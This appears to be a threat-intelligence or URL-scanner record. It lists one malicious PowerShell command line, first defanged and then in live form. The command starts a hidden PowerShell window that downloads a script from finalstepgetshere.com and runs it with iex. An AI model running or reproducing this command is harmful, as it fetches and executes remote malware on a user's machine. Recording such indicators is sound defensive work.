hxxp://\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1[.]0\powershell[.]exe C[:]\Windows\system32\WindowsPowerShell\v1[.]0\PowerShell[.]exe -W Hidden -command $url = 'hxxps://finalstepgetshere[.]com/uploads/il11[.]txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response[.]Content; iex $text

Sharing

Target

http://\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -W Hidden -command $url = 'https://finalstepgetshere.com/uploads/il11.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text